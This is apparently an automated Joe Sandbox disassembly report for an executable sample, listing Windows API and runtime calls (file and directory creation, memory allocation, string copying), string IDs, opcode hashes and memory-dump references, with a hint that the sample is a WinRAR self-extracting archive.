                                                                                                                • Opcode ID: f379cc95902ed08e83f97382e802f714073fc59aa9693faf8f538d785d6520c3
                                                                                                                • Instruction ID: ecd6d351edc22f46ae8be71b77f06f45e1643f3f8673f6d176c577ed9040455b
                                                                                                                • Opcode Fuzzy Hash: f379cc95902ed08e83f97382e802f714073fc59aa9693faf8f538d785d6520c3
                                                                                                                • Instruction Fuzzy Hash: 8C01A2353007055FD728AA26D89193BB3E9EF88764350443FE99BA7B91EA39BC408718
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0040D722: _wcscpy.LIBCMT ref: 0040D727
                                                                                                                • _wcslen.LIBCMT ref: 0040D7BA
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcscpy_wcslen
                                                                                                                • String ID: C:\Users\user\AppData\Roaming$Software\WinRAR SFX
                                                                                                                • API String ID: 2972469078-1253669567
                                                                                                                • Opcode ID: dbf7a9eafdb00e32b7fa3a1cd4a02a707e8d6c2303726e21c83354b9ecb7df4e
                                                                                                                • Instruction ID: 37e9c84edacda6ef8b290c17bb8ede74041c423b0af695c938205bf6bd656323
                                                                                                                • Opcode Fuzzy Hash: dbf7a9eafdb00e32b7fa3a1cd4a02a707e8d6c2303726e21c83354b9ecb7df4e
                                                                                                                • Instruction Fuzzy Hash: E701A27290014CBEDB21EB91CC82EEBB76DEB0434DF10407BB90472191D7B99F889668
                                                                                                                APIs
                                                                                                                • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,?,?,00406F63,?,?,?), ref: 00409124
                                                                                                                • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00406F63,?,?,?,?), ref: 0040915B
                                                                                                                • CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,?,00406F63,?,?,?,?,?,?,?), ref: 004091D5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateFile$CloseHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 1443461169-0
                                                                                                                • Opcode ID: b5837578b0fb8a74a89ebb6aafe3dcaaf2b0bb615231f154bfd1d540f5643522
                                                                                                                • Instruction ID: 95f1cede71bd50614698bc96caefb9e91995bc6177c28dbadab223eae8176ebb
                                                                                                                • Opcode Fuzzy Hash: b5837578b0fb8a74a89ebb6aafe3dcaaf2b0bb615231f154bfd1d540f5643522
                                                                                                                • Instruction Fuzzy Hash: 5841A231A04159BEEF11DBA4CC59FEE7BB9AF01304F1440AAF441BB2D2C6799E45C754
                                                                                                                APIs
                                                                                                                • GetLastError.KERNEL32(?,00000000,?,00000001), ref: 00408B40
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast
                                                                                                                • String ID: lB$lB
                                                                                                                • API String ID: 1452528299-3074592483
                                                                                                                • Opcode ID: 41223a0690c9943b579172c45711a0e92a8b504fd08c0f20e9afd5d469d02a97
                                                                                                                • Instruction ID: a9f5364123ab57dd96d5c9edda6ce22fb466f6343c4bad4e1d645adddfd0e67b
                                                                                                                • Opcode Fuzzy Hash: 41223a0690c9943b579172c45711a0e92a8b504fd08c0f20e9afd5d469d02a97
                                                                                                                • Instruction Fuzzy Hash: 850128B2B01304BED724A6798E41DAB76BE8B81324758473FF552E32C0DA78AD009269
                                                                                                                APIs
                                                                                                                • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,00406E31,?,?,?), ref: 0040923B
                                                                                                                • GetLastError.KERNEL32(?,?,00406E31,?,?,?), ref: 00409283
                                                                                                                  • Part of subcall function 0040A5D3: _wcslen.LIBCMT ref: 0040A5ED
                                                                                                                  • Part of subcall function 0040A5D3: _wcsncpy.LIBCMT ref: 0040A624
                                                                                                                  • Part of subcall function 0040A5D3: _wcscpy.LIBCMT ref: 0040A62E
                                                                                                                • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,00406E31,?,?,?), ref: 0040926A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateDirectory$ErrorLast_wcscpy_wcslen_wcsncpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 1806569215-0
                                                                                                                • Opcode ID: 8a04b754f84aa708b8585edd25d510c85e250decd751a17a7b28c3e38ae42f96
                                                                                                                • Instruction ID: 1aa824f4aff8a1799dba1ebb7fead8b9cdd8c781bc75b68785801ff98654630a
                                                                                                                • Opcode Fuzzy Hash: 8a04b754f84aa708b8585edd25d510c85e250decd751a17a7b28c3e38ae42f96
                                                                                                                • Instruction Fuzzy Hash: 48017C3160020575DA21A665AC01FFB7758AB86B84F0808BFF941F61C6C67C9D8296AA
                                                                                                                APIs
                                                                                                                • GetLastError.KERNEL32(00000000,00000000,00429578,0000000C,0041E244,00000000,004298A0,0000000C,0041E27E,00000000,00419CF5,?,00423A76,00000004,00429A40,0000000C), ref: 0041981C
                                                                                                                  • Part of subcall function 0041E263: __mtinitlocknum.LIBCMT ref: 0041E279
                                                                                                                  • Part of subcall function 0041E263: __amsg_exit.LIBCMT ref: 0041E285
                                                                                                                • ___sbh_find_block.LIBCMT ref: 004197CC
                                                                                                                • ___sbh_free_block.LIBCMT ref: 004197DB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast___sbh_find_block___sbh_free_block__amsg_exit__mtinitlocknum
                                                                                                                • String ID:
                                                                                                                • API String ID: 2804226415-0
                                                                                                                • Opcode ID: f86b8c1ff154f421cf87839cb751ab4234f952b18326312c56534221757df00f
                                                                                                                • Instruction ID: 5bc8404b7fe6052094105754a90b84c37754d318645a708e6f8cb822513909e2
                                                                                                                • Opcode Fuzzy Hash: f86b8c1ff154f421cf87839cb751ab4234f952b18326312c56534221757df00f
                                                                                                                • Instruction Fuzzy Hash: DF018F75901311EADB347BB3A8167DE3BA49F02724F20015FF91066191CA7C9EC08AAD
                                                                                                                APIs
                                                                                                                • _malloc.LIBCMT ref: 00419BFE
                                                                                                                  • Part of subcall function 0041C2DE: __FF_MSGBANNER.LIBCMT ref: 0041C301
                                                                                                                  • Part of subcall function 0041C2DE: __NMSG_WRITE.LIBCMT ref: 0041C308
                                                                                                                  • Part of subcall function 0041C2DE: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001), ref: 0041C355
                                                                                                                • std::bad_alloc::bad_alloc.LIBCMT ref: 00419C21
                                                                                                                  • Part of subcall function 00419B7A: std::exception::exception.LIBCMT ref: 00419B86
                                                                                                                • std::bad_exception::bad_exception.LIBCMT ref: 00419C35
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                • String ID:
                                                                                                                • API String ID: 832318072-0
                                                                                                                • Opcode ID: c0e1d07e0a850f133a1bc45ded329e55b31414210d0f15b9a1d4eefbb553867f
                                                                                                                • Instruction ID: c2cfc0a2235a5e87532e02d880bbeb878a016bc831ea289a736c2ee95b08eacd
                                                                                                                • Opcode Fuzzy Hash: c0e1d07e0a850f133a1bc45ded329e55b31414210d0f15b9a1d4eefbb553867f
                                                                                                                • Instruction Fuzzy Hash: 94F0E235A4810976CB156B62EC66AD93B58AB41318F24402FFC0695591DF3CFDC5868D
                                                                                                                APIs
                                                                                                                • _wcscpy.LIBCMT ref: 004085D3
                                                                                                                  • Part of subcall function 00410823: _wcsncpy.LIBCMT ref: 0041083A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcscpy_wcsncpy
                                                                                                                • String ID: lB
                                                                                                                • API String ID: 61306229-323450203
                                                                                                                • Opcode ID: 29149b8486b6adac1c4e54a3afb5b0cb0c3871d1621f901de47ab55ff35e2088
                                                                                                                • Instruction ID: 103a58baa05930c9378de64f2962b06913be03748a020ebcdecdd149c9e069be
                                                                                                                • Opcode Fuzzy Hash: 29149b8486b6adac1c4e54a3afb5b0cb0c3871d1621f901de47ab55ff35e2088
                                                                                                                • Instruction Fuzzy Hash: F851F731504144AACF21AE648E859FF37688B56304F16087FF9C5B73C2CA3E8C85975E
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 004080F5
                                                                                                                  • Part of subcall function 00407F5D: __EH_prolog.LIBCMT ref: 00407F62
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: lB
                                                                                                                • API String ID: 3519838083-323450203
                                                                                                                • Opcode ID: 339fbb9184cc942aba44bf293f10f5ac3a776cdc16ff60d33c7e031d5c85ee74
                                                                                                                • Instruction ID: 0a1a8c58c61574b9b0333402115fdb142e78c728f2fcd81d1704bff6031d242b
                                                                                                                • Opcode Fuzzy Hash: 339fbb9184cc942aba44bf293f10f5ac3a776cdc16ff60d33c7e031d5c85ee74
                                                                                                                • Instruction Fuzzy Hash: 9E41BD31900618EBDF14AF91CD42AEA7775AF41704F0440BEEA497B2D2CB786E45CB69
                                                                                                                APIs
                                                                                                                • GetLongPathNameW.KERNEL32(?,?,00000218), ref: 0229183F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LongNamePath
                                                                                                                • String ID: kL
                                                                                                                • API String ID: 82841172-2496334608
                                                                                                                • Opcode ID: 241245e99bfbef9596039d4900aa27c8ff6b8e54742629117780be22d654b086
                                                                                                                • Instruction ID: 85a9c10b93fe6f906db657b007f4e96b00ba070b1a1f4ce62967ce3a45a67434
                                                                                                                • Opcode Fuzzy Hash: 241245e99bfbef9596039d4900aa27c8ff6b8e54742629117780be22d654b086
                                                                                                                • Instruction Fuzzy Hash: 61212971A6020EA6DF14DBE6EC49AFA73A9FF55300F6005A9E41EC7184E7309961DB50
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 00416DA1
                                                                                                                  • Part of subcall function 00414F5B: _memset.LIBCMT ref: 00414F6F
                                                                                                                  • Part of subcall function 00414F5B: _memset.LIBCMT ref: 00414F8A
                                                                                                                  • Part of subcall function 00414F5B: _memset.LIBCMT ref: 00414FE1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memset
                                                                                                                • String ID: lB
                                                                                                                • API String ID: 2102423945-323450203
                                                                                                                • Opcode ID: 45512c126a182eb73f96b96e4e4e61670663b11b625d16f8a7cdea84c1466f0f
                                                                                                                • Instruction ID: 37c4a38e13e4494c5614bf404c0b6c02a1badd40d6e150641bedbf9ffa0c83f3
                                                                                                                • Opcode Fuzzy Hash: 45512c126a182eb73f96b96e4e4e61670663b11b625d16f8a7cdea84c1466f0f
                                                                                                                • Instruction Fuzzy Hash: 5821C5B1600A809BC721DE39D8807EAB7E5EB4531AF018C2FE5699B341D738E981CF58
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: CMT
                                                                                                                • API String ID: 3519838083-2756464174
                                                                                                                • Opcode ID: 959695e3af591dadd077a55fdc18d985d261133e4173b4917ee6667d8de57ae5
                                                                                                                • Instruction ID: 54a74378d9f4caaf32509a2907d6515583790e049b7064e6243dd4886224a737
                                                                                                                • Opcode Fuzzy Hash: 959695e3af591dadd077a55fdc18d985d261133e4173b4917ee6667d8de57ae5
                                                                                                                • Instruction Fuzzy Hash: 8321D575600654AFCF05AF64C8508AEBB69AF45314F04806EF896773E2CB399E41CB69
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00401279
                                                                                                                  • Part of subcall function 00402BA4: __EH_prolog.LIBCMT ref: 00402BA9
                                                                                                                • _wcslen.LIBCMT ref: 0040131B
                                                                                                                  • Part of subcall function 004197A3: ___sbh_find_block.LIBCMT ref: 004197CC
                                                                                                                  • Part of subcall function 004197A3: ___sbh_free_block.LIBCMT ref: 004197DB
                                                                                                                  • Part of subcall function 004197A3: GetLastError.KERNEL32(00000000,00000000,00429578,0000000C,0041E244,00000000,004298A0,0000000C,0041E27E,00000000,00419CF5,?,00423A76,00000004,00429A40,0000000C), ref: 0041981C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$ErrorLast___sbh_find_block___sbh_free_block_wcslen
                                                                                                                • String ID:
                                                                                                                • API String ID: 3798303308-0
                                                                                                                • Opcode ID: df58e2bec009990b8100a990398cffe66055091cc66e7b39624638c927f14ddc
                                                                                                                • Instruction ID: 4cfb938cf6160edf3e7808a47aca77b20e6138c2b5def0451c264f645c9f735e
                                                                                                                • Opcode Fuzzy Hash: df58e2bec009990b8100a990398cffe66055091cc66e7b39624638c927f14ddc
                                                                                                                • Instruction Fuzzy Hash: EF219F31C00219EBCF11AF95E841AEEBBB9AF48708F10417FF811B21A1C77D19519B99
                                                                                                                APIs
                                                                                                                • __RTC_Initialize.LIBCMT ref: 0229F622
                                                                                                                  • Part of subcall function 0229F983: RtlInitializeSListHead.NTDLL(022E48A8), ref: 0229F988
                                                                                                                • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 0229F68C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                                                                                                                • String ID:
                                                                                                                • API String ID: 3231365870-0
                                                                                                                • Opcode ID: 69202f3eeb972429ddba5b25e32bb932189cece6fb132bd84ded11eea4b1b5e7
                                                                                                                • Instruction ID: 10cb09e42c0af2d7fad3c9ad91b18b658a88f8c48b2fd64d77b774fed301bf3d
                                                                                                                • Opcode Fuzzy Hash: 69202f3eeb972429ddba5b25e32bb932189cece6fb132bd84ded11eea4b1b5e7
                                                                                                                • Instruction Fuzzy Hash: D3212632AB83819EEF90FBF4AA1579C37D29F05369F100459D8A1EBAE9DB604040CE25
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0040F147
                                                                                                                  • Part of subcall function 00401788: __EH_prolog.LIBCMT ref: 0040178D
                                                                                                                  • Part of subcall function 00401788: _memset.LIBCMT ref: 004018D3
                                                                                                                  • Part of subcall function 00401788: _memset.LIBCMT ref: 004018E2
                                                                                                                  • Part of subcall function 00401788: _memset.LIBCMT ref: 004018F1
                                                                                                                  • Part of subcall function 004016CE: __EH_prolog.LIBCMT ref: 004016D3
                                                                                                                • _malloc.LIBCMT ref: 0040F1AF
                                                                                                                  • Part of subcall function 0041C2DE: __FF_MSGBANNER.LIBCMT ref: 0041C301
                                                                                                                  • Part of subcall function 0041C2DE: __NMSG_WRITE.LIBCMT ref: 0041C308
                                                                                                                  • Part of subcall function 0041C2DE: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001), ref: 0041C355
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog_memset$AllocateHeap_malloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 47157355-0
                                                                                                                • Opcode ID: 075d6e2109519fb30cfb052b084912381f159b7a6281ad439503faf44ca86e10
                                                                                                                • Instruction ID: 28130a522ea1f1181dc9059b476446ffb52416e1d2ad285f7c741a74d34e2598
                                                                                                                • Opcode Fuzzy Hash: 075d6e2109519fb30cfb052b084912381f159b7a6281ad439503faf44ca86e10
                                                                                                                • Instruction Fuzzy Hash: 102167B2900259DFCB11DF99C8809EEBBB4BF09318F14007FE41AB7291DB395A49CB64
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0040A0C9: _wcsncpy.LIBCMT ref: 0040A0E8
                                                                                                                • _swprintf.LIBCMT ref: 0040DB1B
                                                                                                                • SetDlgItemTextW.USER32(00000065,?), ref: 0040DB32
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
